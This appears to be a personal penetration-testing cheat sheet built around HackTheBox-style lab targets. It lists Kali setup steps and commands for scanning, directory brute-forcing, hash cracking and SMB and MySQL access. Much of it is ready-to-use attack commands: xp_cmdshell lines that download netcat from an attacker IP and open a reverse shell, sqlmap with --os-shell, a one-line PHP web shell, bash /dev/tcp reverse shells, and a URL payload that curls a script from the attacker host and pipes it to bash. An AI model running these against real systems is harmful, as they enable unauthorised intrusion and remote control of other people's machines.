Pentesting tools and useful commands

GTFOBins — list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

Kali OS

Select Network Repositories

Default:

echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" | sudo tee /etc/apt/sources.list

More stable:

echo "deb http://http.kali.org/kali kali-last-snapshot main contrib non-free" | sudo tee /etc/apt/sources.list

Install all tools:

sudo apt install -y kali-linux-large

Install GUI:

sudo apt install -y kali-win-kex

GUI Documentation. Run GUI, to exit from full screen mode press F8:

kex --win -s

Wappalyzer — browser extension to see the technologies used on websites.

OpenVPN

sudo openvpn --config vpn.ovpn --daemon

The network interface can be checked by running the ifconfig command in the terminal.

Shutdown

sudo ifconfig tun1 down
Search WebCatalogs on site:
dirsearch -u http://october.metaltech.stf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt

Responder

sudo responder -I tun0

John the ripper

zip2john backup.zip > hashes
john -w=/usr/share/wordlists/rockyou.txt hash.txt

Identify possible hashes

hashid 2cb42f8734ea607eefed3b70af13bbd3

Crack hash

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt

Pentesting MSSQL

MSSQL Injection Cheat Sheet

Impacket mssql client

impacket-mssqlclient ARCHETYPE/[email protected] -windows-auth
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.17.81/nc64.exe -outfile nc64.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.17.81 443"

SQL map

sqlmap -u 'http://10.129.10.184/dashboard.php?search=asd' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo'
sqlmap -u 'http://10.129.10.184/dashboard.php?search=asd' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo' --os-shell

winPEAS (Windows Privilege Escalation)

linPEAS (Linux Privilege Escalation)

Evil Win Remote

evil-winrm -i 10.129.233.177 -u administrator -p badminton

Nmap

sudo nmap -sV 192.168.1.1

sudo nmap -sV -sC 192.168.1.1

sudo nmap -p- --min-rate 5000 -sV 192.168.1.1

Gobuster

go install github.com/OJ/gobuster/v3@latest
git clone https://github.com/danielmiessler/SecLists.git
gobuster dir --url http://10.129.236.130/ --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster dir --url http://10.129.119.70/ --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb

MySQL

mysql -h 10.129.132.32 -u root
SHOW databases; : Prints out the databases we can access.
USE {database_name}; : Set to use the database named {database_name}.
SHOW tables; : Prints out the available tables inside the current
database.
SELECT * FROM {table_name}; : Prints out all the data from the table {table_name}.

SMB

smbclient -N -L \\\\{TARGET_IP}\\
-N : No password
-L : This option allows you to look at what services are available on a server

Fully interactive shells

Simple PHP Shell

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Reverse Shell

printf '#!/bin/bash\nbash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1' > shell.sh

Or

bash -c "bash -i >& /dev/tcp/{your_IP}/1337 0>&1"

Start ncat listener

nc -nvlp 1337

Start Web Server

python3 -m http.server 8000

Start example

http://thetoppers.htb/shell.php?cmd=curl%20%3CYOUR_IP_ADDRESS%3E:8000/shell.sh|bash

Functional shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

Upgrade shell

script /dev/null -c bash